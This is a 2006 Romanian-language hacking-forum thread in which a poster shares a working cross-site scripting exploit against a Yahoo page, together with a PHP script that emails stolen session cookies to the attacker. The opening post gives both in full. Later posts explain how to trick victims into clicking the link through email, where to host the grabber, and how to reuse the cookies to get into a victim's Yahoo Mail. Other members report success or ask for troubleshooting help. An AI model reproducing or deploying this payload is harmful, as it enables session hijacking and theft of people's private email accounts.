Guest Nemessis Posted October 9, 2006 Report Share Posted October 9, 2006 Cred ca nu mai este nevoie de multe explicatii. Trimiteti cookie script in mailul victimei si aceasta va trebui sa dea un click pe linkul (sau eventual poza pe care vreti sa o bagati linkata) ce duce catre cookie grabber. Nu uitati sa schimbati path catre cookie grabber (php) si adresa de mail din cookie script. Functioneaza pe IE si pe Yahoo Beta. Succes la furat mailuri.Cookie script<div id=yiv1052512133><a target="_blank" rel="nofollow" _ href="http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady,+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0"><script>location.href='http://www.site.com/grabber.php?email=mailultau@yahoo.com&cookie='+escape(document.cookie)</script>" >Vezi ca mi-am urcat pozele de la disco aici</a></div>Php grabber script:<?php ## Cookie ## http://www.Nemessis.Info $myemail = $_GET['email']; $cookie = $_GET['cookie']; $today = date("l, F j, Y, g:i a") ; $subject = "Master you have an sucker" ; $message = "Rst-Crewn http://www.rst-crew.net nnDate: $today nnCookie: n$cookie nRst-Crewn http://www.rst-crew.net"; $from = "From: Nemessis<nemessis@rst-crew.net>rn"; mail($myemail, $subject, $message, $from); echo "<meta http-equiv='refresh' content='1;url=http://www.rst-crew.net'>"; ?> MODIFICATI MAILUL DIN COOKIE SCRIPT (este trecut ca [mail]mailultau@yahoo.com[/mail] in exemplul meu de mai sus). URCATI PE PAGINA VOASTRA PHP-UL CARE TRIMITE COOKIES FURATE LA VOI IN MAIL . MODIFICATI IN LINKUL DE LA COOKIES EXPLOIT PATH-UL CATRE SITE-UL VOSTRU PE CARE SE AFLA PHP GRABBER (este trecut ca http://site.com/grabber.php in exemplul meu de mai sus).Credit pentru linkul cu vulnerabilitatea XSS http://realestate.yahoo.com/New_York/Schenectady/Homes_for_sale/result.html;_ylt=Auxh9be9E69K5l8hdmj.PAbnMrQs?typeBak=realestate&p=Schenectady%2C+NY&type=classified&search=Search&priceLow=&priceHigh=&bedroomLow=1&bathroomLow=1.0 - DarkProfits (ICQ 5050506b)Adaugiri, modificari si filter bypassing pentru a functiona cookie stealer - Nemessis Link to comment Share on other sites More sharing options...
Sub_Zero Posted October 9, 2006 Report Share Posted October 9, 2006 yes in sfarsit a aparut exploitul,super Nemessis ,mersi mult Link to comment Share on other sites More sharing options...
Guest Nemessis Posted October 9, 2006 Report Share Posted October 9, 2006 Cookie exploit trebuie atasat ca pagina html. Pune codul intr-o pagina html si trimite pagina ca attachement in mailul victimei.MODIFICA MAILUL DIN COOKIE SCRIPT (este trecut ca [mail]mailultau@yahoo.com[/mail] in exemplul meu de mai sus).URCA PE PAGINA TA PHP-UL CARE TRIMITE COOKIES LA TINE IN MAIL . MODIFICA IN LINKUL DE LA COOKIES EXPLOIT PATH CATRE SITE-UL TAU CU PHP (este trecut ca http://site.com/grabber.php in exemplul meu de mai sus). Link to comment Share on other sites More sharing options...
Guest Nemessis Posted October 9, 2006 Report Share Posted October 9, 2006 Alerteaza antivirusul????? Damn! Pe asta nu o stiam. Ia sa instalez si eu mcafee sa vad ce si cum ca suna interesant.For th0r - this exploit it's a little bit different than the other one. You must click on a link to make the script send cookies to your mail. You need to modify the mail address and the php grabber path from "Cookie script". Change the line [mail]mailultau@yahoo.com[/mail] with your email address and http://site.com/grabber.php with your link who have the php grabber uploaded on it. Works on IE and with Yahoo Mail and Yahoo Mail Beta. Link to comment Share on other sites More sharing options...
Guest Posted October 9, 2006 Report Share Posted October 9, 2006 e fass mcofee mcdonals mcfas, gg pt munca ca Nemesis. Link to comment Share on other sites More sharing options...
th0r Posted October 10, 2006 Report Share Posted October 10, 2006 I've been putting it on the signature ..I've also already changed the PHP and the email address ..But when i clicked on the link ..They redirect m3h to the link of that site .. But there are a lot of href=location error on the site ..And the email of the cookies is not been sent to m3h ..Anyway ..Thanks a lot for remembering m3h and put it in english version also Nemessis ..U r the best xD~~Thanks.Th0R Link to comment Share on other sites More sharing options...
th0r Posted October 10, 2006 Report Share Posted October 10, 2006 Thanks for the nice respond Shocker ..Well .. I did attaching it as *.HTML before try to test it on Signature ..But when i sent the message with that *.HTML attachment .. Some of the codes are filtered .. And showed as words within the email ..So i put it in signature and did not show the HTML ..The link is shown as normal link ..I tried to open the link using IE .. Its redirecting m3h to new page, with some error messages ..But there is no email sent to my email about the cookies ..Is this tested today and still working??Thanks.Th0R Link to comment Share on other sites More sharing options...
Guest Nemessis Posted October 10, 2006 Report Share Posted October 10, 2006 Next is firefox. I'm working on it Link to comment Share on other sites More sharing options...
th0r Posted October 10, 2006 Report Share Posted October 10, 2006 ***Edited*** Link to comment Share on other sites More sharing options...
th0r Posted October 10, 2006 Report Share Posted October 10, 2006 Hahaha ..iC ..I will try it again ..Thanks for the respond dude ..Thanks.Th0R Link to comment Share on other sites More sharing options...
ENCODED Posted October 11, 2006 Report Share Posted October 11, 2006 merge ajtept si varianta pentru firefox . Thanks.ENCODED Link to comment Share on other sites More sharing options...
hanibal Posted October 11, 2006 Report Share Posted October 11, 2006 kw3 tata ai windoz 98? Link to comment Share on other sites More sharing options...
Guest Nemessis Posted October 11, 2006 Report Share Posted October 11, 2006 Cum ai ajuns la concluzia asta hanibal? Link to comment Share on other sites More sharing options...
Sad_Dreamer Posted October 11, 2006 Report Share Posted October 11, 2006 cafeaua face minuni Link to comment Share on other sites More sharing options...
YceFire Posted October 11, 2006 Report Share Posted October 11, 2006 Mi'a mers si mie ( mersi fain Nemessis ) Da am o intrebare, cam asa arata cookieul nu ?:, si cu ce(sau cum ) decriptez chestia aia :@ :@ Mersi mult Link to comment Share on other sites More sharing options...
Sad_Dreamer Posted October 11, 2006 Report Share Posted October 11, 2006 nu o decriptezi..o inlocuiesti..la fel ca la celalalt exploit Link to comment Share on other sites More sharing options...
Guest Nemessis Posted October 11, 2006 Report Share Posted October 11, 2006 Cauta la tutoriale video. Vei vedea cum se procedeaza. Ia addonul pentru mozilla add_n_edit_cookies. O sa pun un program facut special pentru cookies de yahoo care va deschide direct mailul victimei. Trebuie sa dati doar copy/paste in el la ce primiti in mail Link to comment Share on other sites More sharing options...
MiniDisc Posted October 11, 2006 Report Share Posted October 11, 2006 YceFire wrote: Mi'a mers si mie ( mersi fain Nemessis ) Da am o intrebare, cam asa arata cookieul nu ?:, si cu ce(sau cum ) decriptez chestia aia :@ :@ Mersi multbumbl3b334u :@ :@ :@ Link to comment Share on other sites More sharing options...
YceFire Posted October 11, 2006 Report Share Posted October 11, 2006 MiniDisc wrote: YceFire wrote: Mi'a mers si mie ( mersi fain Nemessis ) Da am o intrebare, cam asa arata cookieul nu ?:, si cu ce(sau cum ) decriptez chestia aia :@ :@ Mersi multbumbl3b334u :@ :@ :@Ce uameni :@ :@ :@ , abia astept programul Nemessis, dar pana atunci o sa ma uit peste tut ala video .Ms fain baieti Link to comment Share on other sites More sharing options...
DJAx3L Posted October 11, 2006 Report Share Posted October 11, 2006 am pus tot scriptu , site, tot am citit de enshpe mii de ori topicul asta... si cand trimit nu imi vine nici un cookie nici dupa ce am intrat pe site nici dupa 10 minute nici dupa o jumate de ora ..sugestii? Link to comment Share on other sites More sharing options...
MaHaReT Posted October 11, 2006 Report Share Posted October 11, 2006 deocamdata , in acest moment nu ma bag sambata si duminica daca am ceva timp , poate incerc si io ma mai documentez ... ! Link to comment Share on other sites More sharing options...
Zeus Posted October 11, 2006 Report Share Posted October 11, 2006 ...mai oameni buni deci treaba MERGE!!!...daca ai facut toata treaba asa ca in explicatii o sa primesti cookie-ul in email...dupa cate stiu io mai recent ( am mai incercat si acum)...daca victima intra si da Sign Out te duce pe pagina cu userul victimei dar iti cere parola... daca ma insel va rog corectatima ptr. ca nu sunt sigur am facut rpd. acum...in trecut stiu ca mergea......deci sa explic asa cum iam zis la unu de o inteles......deci sunt 2 parti:un Cookie Script si un Php Grabber.....se copiaza ce scrie acolo la Cookie Script se pune in Notepad si inainte de salvare se modifica http://www.site.com/grabber.php http://www.site.com fiind siteul care il ai tu si grabber.php ii partea II- a din toata tarasenia asta...care o poti numi index.php numai sa nu uiti sa pui http://www.siteeul tau.com/index.php......dupa care modifici si [mail]mailultau@yahoo.com[/mail] cu mailul unde vrei matale sa iti vina cookie-ul...si dai sa il salvezi...cand il salvezi in notepad stergi tot ce scrie acolo la File Name si pui .html iar mai jos la Save as type pui Any Files si dai OK....Deci acum ai un Html......html asta il atasezi in mailul ala care il trimiti la victima...partea a 2-a: ...se ia si se copiaza al doilea text (php grabber)...se pune in notepad dupa care se da File---> Save as iar la File name se scrie index.php...si la Save as type se pune all files dupa care ok....deci acum ai una bucata php file......se face un cont de ex. pe as.ro intri in cont te duci la File Manager Incarci index.php (vezi sa fie index cu litere mici) dupa ce ai trimis .html la victima astepti si te rogi sa dea click pe link ca sa iti vina in mail cookie-ul......dupa ce ai cookie-ul ..astepti sa puna Nemesis un cookie editor special ptr. asa ceva....daca tot vrei sa te incumeti foloseste editorul indicat si ai grija sa pui fiecare (ex: v=jdjhdhuhuhau=k93) la locul lui...p.s ...sa nu se zica ca am scris ca la copii...ca io stiu deja vreo 3 - 4 care nu or inteles si cred ca sunt mai multi care citesc si nu stiu cum sa faca...!!!Bafta Link to comment Share on other sites More sharing options...
Guest Nemessis Posted October 11, 2006 Report Share Posted October 11, 2006 Aveti'>http://rapidshare.de/files/36395962/Yahoo_cookie_exploit_browser.rar.htmlAveti instructiunile in interiorul arhivei. NOTA: - aveti nevoie de Microsoft NET Framework Version 2.0 pentru a putea folosi programul. Il gasiti pe Microsoft.com sau cautati-l pe google, dc++ etc. Link to comment Share on other sites More sharing options...
Zeus Posted October 11, 2006 Report Share Posted October 11, 2006 ...si pe http://www.megaupload.com/?d=LRIEGMYI...ca majoritatea nu pot sa ia de pe rapidshare.de ...eu as zice nici sa nu se mai puna la sasalaii aia... ...cu atatea siteuri free nu se merita oboseala......dupa cum ziceam ...nu mai merge sa intri direct in mailul victimei...daca o dat sign out...sau se pare ca si daca nu o dat... (am incercat de mai multe ori si cu asta si tot asa...)...gata... ... Link to comment Share on other sites More sharing options...
bossjuan Posted October 12, 2006 Report Share Posted October 12, 2006 cine are un host free sa mearga ca pe 100webspace nu mai vrea sa mearga graber-ul Link to comment Share on other sites More sharing options...